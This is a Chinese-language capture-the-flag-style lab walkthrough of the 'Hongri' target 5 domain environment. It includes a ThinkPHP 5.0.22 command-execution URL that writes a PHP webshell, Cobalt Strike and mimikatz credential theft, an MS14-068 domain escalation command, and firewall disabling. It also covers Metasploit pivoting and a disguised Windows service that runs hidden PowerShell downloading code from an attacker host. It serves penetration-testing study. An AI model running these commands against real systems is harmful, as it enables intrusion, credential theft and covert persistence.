红日靶机五

一、信息收集

cms扫描

端口扫描

目录扫描

输入错误路径,发现是5.0.22版本

查找poc

命令执行 插入木马

http://192.168.62.128?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php eval($_POST[cmd]);?^> > 1.php

信息收集

ipconfig  /all

二、cs反弹

vps上线cs  创建监听

目标机上线失败(步骤省略)

设置在kali     启动cs

设置心跳,靶机个人可以直接设置为1

三、提权

shell systeminfo

Interact 打开beacon

Access

      dumphashes 获取hash

      Elevate 提权

      GoldenTicket 生成黄金票据注入当前会话

      MAketoken  凭证转换

      RunMimikatz 运行Mimikatz

      SpawnAs 用其他用户生成CobaltStrike侦听器

Explore

      BrowserPivot 劫持目标浏览器进程

      Desktop(VNC)  桌面交互

      FileBrowser  文件浏览器

      NetView 命令Net View

      Portscan 端口扫描

      Processlist 进程列表

      Screenshot截图

Pivoting

      SOCKSServer 代理服务

      Listener  反向端口转发

      DeployVPN 部署VPN

Spawn

      新的通讯模式并生成会话

Session  会话管理

    获取hash

利用cs提权

提权成功得到一个system权限

桌面交互

文件浏览

查看端口

查看进程

屏幕截图

查看防火墙并关闭

shell netsh firewall show state

shell netsh advfirewall set allprofiles state off

四、内网信息收集(准备横向)

ip地址信息

shell ipconfig

扫描端口

信息收集

net user xxx   /domain                   查询用户的详细信息

net   config   workstation                        查询当前登录域及登录用户信息

net   time  /domain                                  用于判断主域(域服务器常作为时间服务器)

net   view  /domain                      查询域

net  view   /domain:xxx                     查询域内所有计算机

net  group    /domain                         查询域内所有用户组列表

nltest   /domain_trusts                获取域信任信息

nltest         /dclist:xxxx                       获取域控的机器名

查询域  查询域控

net view

net dclist

shell net user

抓取密码

发现leo用户

五、身份伪造

使用spawn as命令生成其他用户凭据

查看内网主机

net view

查看域控组

shell net group "Domain Controllers" /domain

查看域管理员

shell net group "Domain Admins" /domain

查看用户SID

shell whoami /all

收集域内信息

net user \192.168.138.138

查看修补程序

六、域提权

文件上传

进行提权  MS14-068尝试一下域提权

MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>

输入

shell ms14-068.exe -u leo@sun.com -p 123.com -s S-1-5-21-3388020223-1982701712-4030140183-1110 -d 192.168.138.138

命令执行后,会创建.ccache文件。证明漏洞触发成功。

七、进程注入内存

mimikatz kerberos::purge  清空当前机器中所有凭证

mimikatz kerberos::list 查看当前机器凭证

mimikatz kerberos::ptc TGT_leo@sun.com.ccache 将票据注入到内存中

八、横向渗透

横向渗透进入域控

信息收集

九、联动msf

修改msf监听为tcp

改为reverse_tcp  和443 端口

十、Socks代理

添加路由

run autoroute -s 192.168.138.0/24

run autoroute -p

或者

自动添加:run post/multi/manage/autoroute

成功添加路由后,即可使用auxiliary/server/socks4a进行代理操作

use auxiliary/server/socks4a

options #详细设置信息

set srvport 1000 #设置代理端口

run

端口转发工具出现了问题

十一、持久控制

设置powershell脚本开机自启动后门。

使用SC命令创建windows服务名最好伪装下,binpath= 这里一定要注意有个空格不然创建不成功把powershell远程执行下载命令也包含进去地址

 shell sc create "bingtang" binpath= "cmd /c start powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://vps或者kali地址/a'))""

这时目标就会有个刚创建个为"bingtang"的服务,可执行文件的路径都在刚刚命令执行过程中指定到的里面

shell sc config "name" start= auto 我们需要把这个name服务设置为自动。

shell sc description "bingtang" "description" 设置服务的描述字符串

net start "bingtang" 启动服务

shell sc delete "bingtang" 删除这个服务,不想使用服务直接删除

学习文章

https://www.icode9.com/content-4-711312.html



原文地址:https://www.cnblogs.com/bingtang123/p/13548981.html